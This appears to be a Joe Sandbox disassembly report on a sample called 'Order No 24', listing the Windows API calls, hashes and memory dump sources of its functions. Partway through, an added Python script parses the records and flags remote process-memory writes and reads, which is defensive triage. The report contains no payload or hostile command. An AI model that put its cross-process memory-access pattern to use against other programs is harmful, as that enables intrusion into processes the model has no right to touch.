                                                                                                                                  • Instruction ID: a8eb4fd4b96c27daedc21044b129a4429f638aae04b5427c67adb199c72a6491
                                                                                                                                  • Opcode Fuzzy Hash: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                                                                                                                  • Instruction Fuzzy Hash: 1131AD36600249AFDB228E79CC41BEA7BA9FB89334F244715F975922E0D735EC518B90
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009EA15E
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009EA172
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EA196
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                  • Opcode ID: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                                                                                                                  • Instruction ID: 4d924590552698cd5971714c589affb3c81e96c0782e8f7f0fdb5c0ebab2bda9
                                                                                                                                  • Opcode Fuzzy Hash: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                                                                                                                  • Instruction Fuzzy Hash: 2C217F32510218ABDF168F94CC82FEA3B7AEF88754F110214FA556B1E0D6B5BC55CB91
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009EA941
                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009EA94F
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009EA956
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                  • Opcode ID: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                                                                                                                  • Instruction ID: bddeb1a4e4b42c1b106e4bc5ad7115b386d21649f8ece297de0a5dd57b1f6acf
                                                                                                                                  • Opcode Fuzzy Hash: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                                                                                                                  • Instruction Fuzzy Hash: BB21B0B5200209AFDB11DF69CC81D7777ADEB8A3A4B050059FA049B3A2CB31FC128B61
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009E9A30
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009E9A40
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009E9A65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                  • String ID: Listbox
                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                  • Opcode ID: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                                                                                                                  • Instruction ID: ba89e842a0965f757f3a3daefd92fa3903235158875f7f85f1eaaf0dcc76fa12
                                                                                                                                  • Opcode Fuzzy Hash: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                                                                                                                  • Instruction Fuzzy Hash: 6F21D432610158BFDF228F55CC85FBB3BAEEF89750F018129F9549B1A0C6719C52C7A0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009EA46D
                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009EA482
                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009EA48F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                  • Opcode ID: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                                                                                                                  • Instruction ID: 6c1576a732de324e2278dbfce66844469d26edd88f7f19df595c36f13d6ae18c
                                                                                                                                  • Opcode Fuzzy Hash: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                                                                                                                  • Instruction Fuzzy Hash: 6F11C471200248BAEF259F66CC45FAB776DEF89754F014118FA45960F1E2B2E811C720
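The records above list raw API calls without naming the SendMessageW constants or saying how the OpenProcess / VirtualAllocEx / WriteProcessMemory / ReadProcessMemory sequence in the record at 009BC1D3 relates to the control messages around it. The Python below is an added example and not part of the Joe Sandbox report: it parses the report's own "APIs" lines (the sample is that record and the msctls_trackbar32 record, copied from this page), resolves messages above WM_USER against the window class a record names, since the same numeric value means different things to different controls (0x1002 is MCM_SETCURSEL for SysMonthCal32 and LVM_GETIMAGELIST for SysListView32), and flags the remote-write combination together with the allocation protection. Querying a list view or tree view that lives in another process requires exactly that sequence, because the item struct and text buffer must lie in the target's address space, so the flags separate a data-only PAGE_READWRITE buffer (as in the record here, flProtect 0x04) from an executable one. The message table and the triage rules are mine, not the report's.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: two "APIs" records copied from the report above with the
# report's leading whitespace trimmed. An "APIs" line starts a new record.
SAMPLE_RECORDS = """\
APIs
• Part of subcall function 009C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC08,?,?,00000034,00000800,?,00000034), ref: 009C4335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009BC1D3
• Part of subcall function 009C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 009C4300
• Part of subcall function 009C422F: GetWindowThreadProcessId.USER32(?,?), ref: 009C425A
• Part of subcall function 009C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C426A
• Part of subcall function 009C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C4280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC240
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC28D
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009EA46D
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009EA482
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009EA48F
"""

# One API line: optional "Part of subcall function ADDR:", then NAME.MODULE,
# optional "(args)", then "ref: ADDR" (the comma before "ref" is sometimes absent).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list               # raw argument tokens as printed; "?" is unresolved
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the call is reached via a subcall

def parse_records(text: str) -> list:
    """Split report text into records (one per 'APIs' header) of ApiCall."""
    records = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        m = API_LINE.match(line)
        if not m or not records:
            continue
        args = m.group("args")
        records[-1].append(ApiCall(
            api=m.group("api"), module=m.group("mod"),
            args=args.split(",") if args else [],
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None))
    return records

# Control messages (commctrl.h / winuser.h values). Values above WM_USER (0x0400)
# are only meaningful for the class that receives them, hence the class key.
CONTROL_MESSAGES = {
    "Listbox":           {0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL"},
    "msctls_trackbar32": {0x0405: "TBM_SETPOS", 0x0406: "TBM_SETRANGE", 0x0414: "TBM_SETTICFREQ"},
    "msctls_updown32":   {0x0465: "UDM_SETRANGE", 0x0469: "UDM_SETBUDDY"},
    "SysListView32":     {0x1002: "LVM_GETIMAGELIST", 0x1004: "LVM_GETITEMCOUNT",
                          0x1009: "LVM_DELETEALLITEMS", 0x1073: "LVM_GETITEMTEXTW"},
    "SysMonthCal32":     {0x1002: "MCM_SETCURSEL", 0x1009: "MCM_GETMINREQRECT"},
    "SysTreeView32":     {0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST"},
}

def resolve_message(msg: int, window_class: Optional[str] = None) -> list:
    """Name(s) for msg. With a class, at most one name; without, every candidate,
    because the per-control ranges overlap."""
    if window_class is not None:
        name = CONTROL_MESSAGES.get(window_class, {}).get(msg)
        return [name] if name else []
    return [f"{cls}:{tbl[msg]}" for cls, tbl in CONTROL_MESSAGES.items() if msg in tbl]

def sent_messages(record: list, window_class: Optional[str] = None) -> list:
    """Decode the uMsg argument (second parameter) of each SendMessageW call."""
    out = []
    for c in record:
        if c.api == "SendMessageW" and len(c.args) >= 2 and c.args[1] != "?":
            msg = int(c.args[1], 16)
            out.append((c.ref, msg, resolve_message(msg, window_class)))
    return out

REMOTE_WRITE = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"}

def triage(record: list) -> dict:
    """The API combinations an analyst reads first in such a record."""
    apis = {c.api for c in record}
    # flProtect is VirtualAllocEx's fifth argument; PAGE_EXECUTE* are 0x10..0x80.
    prot = [c.args[4] for c in record if c.api == "VirtualAllocEx" and len(c.args) > 4]
    return {
        "remote_memory_write": REMOTE_WRITE <= apis,
        # write a struct into the target, message the control, read the result
        # back: the cross-process pattern behind LVM_GETITEMTEXT-style queries.
        "cross_process_control_io": REMOTE_WRITE <= apis
            and {"ReadProcessMemory", "SendMessageW"} <= apis,
        "alloc_executable": any(p != "?" and int(p, 16) & 0xF0 for p in prot),
        "indirect_calls": sorted({c.subcall for c in record if c.subcall is not None}),
    }
```

Run it over a whole report dump rather than the embedded sample by passing the file text to parse_records; the "String ID" line of each record supplies the window class to hand to sent_messages.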
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009A2350,?), ref: 009A22A1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 009A22A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                                  • Opcode ID: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                                                                                                                  • Instruction ID: fe114edb0c7212c1b64062de15b35653a59d4ebb0ffce78ae2fca2dc5745c9e5
                                                                                                                                  • Opcode Fuzzy Hash: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                                                                                                                  • Instruction Fuzzy Hash: 2DE01A796A0304ABEB20DFF8ED4DF143668B756702F004520B642D50E0CBB64053DF04
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A2276), ref: 009A2376
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 009A237D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                                  • Opcode ID: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                                                                                                                  • Instruction ID: 31b9492fe64a68ed9a3f67a6d648b239b4c2bfd8f8582445f76cc4c1f0273074
                                                                                                                                  • Opcode Fuzzy Hash: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                                                                                                                  • Instruction Fuzzy Hash: 93E0B679645304ABDB20EFE8ED0DF043A69B767B06F200514F24AD20B0CBBA9412AA14
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                  • Opcode ID: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                                                                                                                  • Instruction ID: f4a3c9752a2ed33c3d2e45aaf1b60b18b767c4cb3c302cc817b0cf72c16a7d33
                                                                                                                                  • Opcode Fuzzy Hash: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                                                                                                                  • Instruction Fuzzy Hash: BBE012F180561CEBCB51D790CD45DFA737CA708741F100892FA8AA1000D63D9B95AB12
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009842EC,?,009842AA,?), ref: 00984304
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984316
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                  • Opcode ID: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                                                                                                                  • Instruction ID: 2804eae11e63a6cdf5dc77719092a106025b2355144583099518b1b6bc138a9c
                                                                                                                                  • Opcode Fuzzy Hash: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                                                                                                                  • Instruction Fuzzy Hash: 2ED0C772544717AFD720AFA5F80D741B6D8BF14711F10895AF555D2264DBB0C8818750
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,009E21FB,?,009E23EF), ref: 009E2213
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 009E2225
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                                  • Opcode ID: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                                                                                                                  • Instruction ID: 5b6b0131e9b847ac79e0afc22dc468d1071ca1c70287b67b847e0e7da384a38e
                                                                                                                                  • Opcode Fuzzy Hash: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                                                                                                                  • Instruction Fuzzy Hash: F1D0A736800716AFC7269FB1F808601B6DCFB0C301F104819F852E2250DB70DC818760
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,009841BB,00984341,?,0098422F,?,009841BB,?,?,?,?,009839FE,?,00000001), ref: 00984359
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0098436B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                  • Opcode ID: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                                                                                                                  • Instruction ID: 1835106bd3f34d262edc21a743e2aa2c6a30bf676b9bd655de841806f8e69cbd
                                                                                                                                  • Opcode Fuzzy Hash: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                                                                                                                  • Instruction Fuzzy Hash: DCD0C772544717BFD720AFF5E809741B6D8BF14715F10496AF496D2250EBB0D8818750
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,009C051D,?,009C05FE), ref: 009C0547
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 009C0559
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                                  • Opcode ID: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                                                                                                                  • Instruction ID: ab2ddc5efcc148aaaf3d81dce8496a87e0dbcbc065730a65941a9b4adba1653c
                                                                                                                                  • Opcode Fuzzy Hash: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                                                                                                                  • Instruction Fuzzy Hash: FFD0C771944716EFD720DFA5E808B41B6E8BB54711F10C91DF596D2250DA70C8818B51
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,009C052F,?,009C06D7), ref: 009C0572
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 009C0584
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1587604923
• Opcode ID: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
• Instruction ID: bc152a1b21c30e85adc20d5ef0b8b3af38288bd593f2cbb438ea42f6525110cd
• Opcode Fuzzy Hash: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
• Instruction Fuzzy Hash: 35D0C771944716EFDB209FB5E809F42B7E8BB44711F108A1DF855D2150DB70D4C18B61
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,009DECBE,?,009DEBBB), ref: 009DECD6
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009DECE8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
